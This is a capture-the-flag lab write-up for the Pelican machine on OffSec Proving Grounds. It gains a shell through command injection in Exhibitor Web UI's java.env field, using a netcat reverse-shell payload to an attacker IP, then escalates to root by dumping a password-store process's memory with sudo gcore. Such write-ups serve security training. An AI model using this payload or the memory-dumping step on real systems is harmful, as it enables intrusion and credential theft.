Pelican
Writeup for Pelican from offsec Proving Grounds
Information Gathering
sudo ./nmapAutomator.sh 192.168.197.98 all
Service Enumeration
HTTP (Port 8080)
HTTP (Port 8081)
This version is v1.0
Exploit
An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1.
The steps to exploit it from a web browser:
Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON
In the “java.env script” field, enter any command surrounded by $() or ``
Payload:
$(/bin/nc -e /bin/sh 192.168.49.197 4444 &)
Start our listener
Click Commit > All At Once > OK.
Proof:
Privesc
gcore
Running LinEnum.sh , we can see that we can run gcore as root without the need for a password!
gcore is an application for dumping information out of memory for running processes.
Looking down further, we see an interesting SUID file /usr/bin/password-store.
We can check if this is a running process that can be dumped with gcore.
ps aux | grep password-store
We can attempt to dump this with gcore using the following command:
sudo -u root /usr/bin/gcore -a -o /home/charles/output 495
We can then move to the output destination directory and run the strings command to see if there is anything useful here.
Interestingly, in the output of the text, we see a field '001 Password: root:' and a password under it.
Using it, we can get root using the su command.
Last updated
